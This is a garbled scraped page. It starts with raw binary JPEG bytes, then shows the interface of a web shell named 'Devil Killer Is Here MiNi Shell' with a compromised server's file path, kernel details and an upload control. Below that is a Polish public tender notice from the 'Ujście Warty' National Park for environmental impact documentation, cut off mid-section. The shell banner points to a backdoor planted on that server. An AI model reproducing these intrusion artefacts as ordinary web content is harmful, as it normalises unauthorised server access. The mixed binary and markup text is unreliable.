JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250610/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250610/0027040201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie Kart Informacyjnych Przedsięwzięcia (KIP) oraz opracowanie pozostałej niezbędnej dokumentacji na potrzeby realizacji prac odtwarzania siedlisk wodnych w ramach realizowanego projektu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Park Narodowy &#34;Ujście Warty&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 081005974</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chyrzyno 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Górzyca</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">69-113</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pnujsciewarty.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pnuw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie Kart Informacyjnych Przedsięwzięcia (KIP) oraz opracowanie pozostałej niezbędnej dokumentacji na potrzeby realizacji prac odtwarzania siedlisk wodnych w ramach realizowanego projektu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f10a30d1-6c56-49b4-9195-81e21caa9889</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00270402</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00091771/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Opracowanie dokumentacji niezbędnej dla uzyskania zgód i pozwoleń na wykonanie prac odtwarzania siedlisk wodnych w projekcie Nr FENX.01.05-IW.01-0016/24</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Odtwarzanie siedlisk wodnych i zwiększenie potencjału rozrodczego ichtiofauny dorzecza Odry na terenie Parku Narodowego „Ujście Warty” - dofinansowany ze środków Programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pnujsciewarty.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja z Wykonawcami pod poniższym linkiem:<br/>https://pnujsciewarty.ezamawiajacy.pl/ lub <br/>https://epuap.gov.pl/wps/portal/strefaklienta/katalog-spraw/profil-urzedu/parkuw lub sekretariat@pnujsciewarty.gov.pl,<br/>Szczegółowe informacje o środkach komunikacji elektronicznej przy użyciu których Zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji<br/>elektronicznej opisane zostały w rozdz. VII SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji:<br/>a) Elektronicznie na adres e-mail: sekretariat@pnujsciewarty.gov.pl lub za pośrednictwem Platformy znajdującej się pod adresem:<br/>https://pnujsciewarty.ezamawiajacy.pl/ w zakładce „Korespondencja” lub za pośrednictwem epuap pod poniższym linkiem:<br/>https://epuap.gov.pl/wps/portal/strefa- klienta/katalog-spraw/profil-urzedu/parkuw<br/>b) Wykonawca, który zamierza przekazywać oświadczenia, wnioski, zawiadomienia oraz informacje za pośrednictwem epuap musi posiadać konto ePUAP.<br/>2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę lub na epuap.<br/>3. Ogólne zasady korzystania z Platformy:<br/>a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Parku Narodowego „Ujście Warty”;<br/>https://pnujsciewarty.ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl.<br/>b) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>c) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w formie lub postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>d) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej<br/>za pośrednictwem Platformy Zakupowej.<br/>e) Wymagania techniczne i organizacyjne, związane z korzystaniem Platformy przez Wykonawcę, zostały przedstawione na stronie<br/>Platformy w zakładce Regulacje i procedury procesu zakupowego.<br/>4. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Szczegółowy opis znajduje się w rozdz. VII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający oświadcza, że jest Administratorem danych osobowych w nawiązaniu do art.4 ust. 7 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez Wykonawcę będą przetwarzane przez Zamawiającego zgodnie z zasadami art.5 RODO oraz zgodnie z przepisami krajowymi.<br/>2. Dane osobowe Wykonawcy będą przetwarzane na podstawie przepisów prawa powszechnie obowiązującego, które nakłada<br/>obowiązki prawne na Zamawiającego (art. 6 ust. 1 lit. c RODO) w związku z ustawą z dnia 11 września 2019r. Prawo zamówień<br/>publicznych- dalej „ustawa Pzp” w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. Opracowanie Kart Informacyjnych Przedsięwzięcia (KIP) oraz opracowanie pozostałej niezbędnej dokumentacji na potrzeby realizacji prac odtwarzania siedlisk wodnych w ramach realizowanego projektu.<br/>3. Odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona<br/>dokumentacja postępowania w związku z zasadą jawności udzielania zamówień w oparciu o art.18 oraz art. 74 ustawy Pzp.<br/>4. Dane osobowe Wykonawcy zawarte w protokole postępowania będą przechowywane, zgodnie z art.78 ustawy Pzp, przez okres 4<br/>lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy przekracza 4 lata, Zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>5. Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w załączniku nr 8 do SWZ.<br/>6. Zamawiający nie planuje przetwarzania danych osobowych Wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli<br/>Zamawiający będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel<br/>określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz<br/>udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>7. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia.<br/>Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których<br/>dane te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>Zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób<br/>pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów składanych na żądanie<br/>Zamawiającego.<br/>8. W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, Wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku nr 1 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że:<br/>- udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów<br/>zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>- udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub<br/>orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia.<br/>- w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od Zamawiającego potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od Zamawiającego kopii danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>- skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16 RODO (z uprawnienia do<br/>sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>- w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>- w przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O.3500.1.2024/1.2_3</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest (usługa) opracowanie Kart Informacyjnych Przedsięwzięcia (KIP) oraz opracowanie pozostałej niezbędnej dokumentacji na potrzeby realizacji prac odtwarzania siedlisk wodnych w ramach projektu pn.: „Odtwarzanie siedlisk wodnych i zwiększenie potencjału rozrodczego ichtiofauny dorzecza Odry na terenie Parku Narodowego „Ujście Warty”.<br/>Zaplanowane prace projektowe odtworzenia siedlisk wodnych (zamulonych wód hipertroficznych) polegają na odmuleniu i tym samym pogłębieniu starorzeczy i kanałów. Prace zostały dogłębnie przeanalizowane i dostosowane do specyfiki Parku Narodowego „Ujście Warty”. Wytypowane wody (kanały) do odtworzenia objęte zakresem przedmiotu niniejszego zamówienia (opracowania wymaganej dokumentacji) dotyczy:<br/>1)	Czerwony Kanał,<br/>2)	Kanał Muszelki,<br/>3)	Kanał Rzęsorka,<br/>4)	Kanał Patelnia,<br/>5)	Kanał od kanału Patelnia do j.Ośniańskiego,<br/>6)	Doprowadzalnik do „Królewskiej Wyspy” i odprowadzalnik do j.Kostrzyńskiego,<br/>7)	Jezioro Kiszki,<br/>8)	Żółty Kanał.<br/>Wykonany zakres przedmiotu zamówienia ma pozwolić Zamawiającemu na realizację pełnego zakresu rzeczowego inwestycji polegającej na odmuleniu i tym samym pogłębieniu starorzeczy i kanałów (udrożnienie wód).<br/><br/>2.	Zakres przedmiotu zamówienia obejmuje m. in.:<br/>1)	przeprowadzenie inwentaryzacji przyrodniczej obejmujące m. in.: herpetofaunę, ichtiofaunę, awifaunę, makrofity, faunę bentosową w zakresie rzadkich, zagrożonych i chronionych gatunków, w tym występowania inwazyjnych gatunków obcych (IGO) związanych ze środowiskiem wodnym,<br/>2)	przeprowadzenie badań terenowych w tym m. in. morfologia wód, pomiary batymetryczne i/lub pomiary miąższości osadów,<br/>3)	wykonanie 8 Kart Informacyjnych Przedsięwzięcia (zwanej dalej KIP) niezbędnych dla uzyskania zgód/pozwoleń na potrzeby realizowanego zadania, dla wytypowanych w ramach projektu ośmiu obszarów wodnych (kanałów) – o których mowa w ust. 1, w tym przygotowywanie i sporządzenie ewentualnych uzupełnień i sprostowań do KIP z dostarczeniem ich Zamawiającemu, gdzie konieczność takich uzupełnień i sprostowań do KIP wyniknie w wyniku prowadzonego postępowania administracyjnego,<br/>4)	uzyskanie w imieniu i na rzecz Zamawiającego decyzji o środowiskowych uwarunkowaniach i zgody wodnoprawne (zgłoszenie wodnoprawne) oraz uzyskanie wszelkich wymaganych uzgodnień i opinii w przypadku gdy ich uzyskanie jest wymagane na podstawie obowiązujących przepisów na potrzeby realizowanego zadania, dla wytypowanych w ramach projektu ośmiu obszarów wodnych (kanałów) – o których mowa w ust. 1,<br/>5)	Opracowanie dokumentacji technicznej wraz załącznikami mapowymi, zawierającymi koncepcje w zakresie czynności (w tym zakres odtwarzania wód, tj. parametry odmulania dna - głębokość, szerokość, długość), sprzętu i potencjalnych rozwiązań niezbędnych do wykonania prac odtwarzania siedlisk (odmuleniu i tym samym pogłębieniu starorzeczy i kanałów (udrożnienie wód)), na podstawie wykonanej indywidualnie morfologii ww. obszarów (m. in. wymiary koryta, głębokość, miąższość osadów) tj. specyfikacje techniczną wykonania i odbioru prac wraz z przedmiarem tych prac i kalkulacją kosztów wykonania tych prac. Powyższa dokumentacja będzie częścią specyfikacji warunków zamówienia – opisu przedmiotu zamówienia – w postępowaniu o zamówienie publiczne na wykonawstwo prac odtwarzania siedlisk wodnych.<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 6 do SWZ <br/>(pn.: Załącznik Nr 6 – SOPZ).<br/><br/>UWAGA: Zamawiający informuje, że udzielone odpowiedzi na zadane pytania w postepowaniu pn.: Opracowanie Kart Informacyjnych Przedsięwzięcia (KIP) oraz opracowanie pozostałej niezbędnej dokumentacji na potrzeby realizacji prac odtwarzania siedlisk wodnych w ramach realizowanego projektu (znak sprawy: O.3500.1.2024/1.2_2) są wiążące i obowiązujące w niniejszym postępowaniu.<br/>Pytania i udzielone odpowiedzi do ww. postępowania są dostępne na stronie internetowej prowadzonego postępowania - link poniżej:<br/>https://pnujsciewarty.ezamawiajacy.pl/pn/pnujsciewarty/demand/notice/public/167594/details <br/><br/>3.	Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z:<br/>1)	zasadami współczesnej wiedzy technicznej,<br/>2)	obowiązującymi normami i przepisami, <br/>3)	postanowieniami projektu umowy i niniejszej SWZ<br/>4)	wymaganiami przepisów prawa, ustaw i aktów wykonawczych, tj. dokumentacja powinna być opracowana zgodnie z m. in.:<br/>a)	ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (tekst jednolity - Dz. U. z 2024 r. poz. 1112 z późn. zm.)<br/>b)	ustawą z dnia 20 lipca 2017 r. – Prawo wodne (tekst jednolity - Dz. U. z 2024 r. poz. 1087 z późn zm.)<br/>c)	ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (tekst jednolity - Dz. U. z 2024 r. poz. 1478 z późn zm.)<br/>d)	ustawą z dnia 27 kwietnia 2001 Prawo ochrony środowiska (tekst jednolity - Dz. U. z 2024 r. poz. 54 z późn zm.),<br/>e)	rozporządzeniem Ministra Środowiska i Klimatu z dnia 17 marca 2022 r. w sprawie formatu dokumentu zawierającego wyniki inwentaryzacji przyrodniczej oraz formatu raportu o oddziaływaniu przedsięwzięcia na środowisko (Dz. U z 2022 r., poz. 652),<br/>f)	rozporządzeniem Rady Ministrów z dnia 10 września 2019 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. z 2019 r., poz. 1839 z późn. zm.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90712000-1 - Planowanie środowiska naturalnego</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">360 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteriami oceny ofert są:<br/>1)	cena oferty (C) - 60 %<br/>2)	doświadczenie osób skierowanych do realizacji zamówienia, tj. herpetologa, ichtiologa, ornitologa, hydrobiologa i hydrologa (D) - 40 %<br/><br/>2.	Sposób wyboru najkorzystniejszej oferty.<br/><br/>1)	Liczba 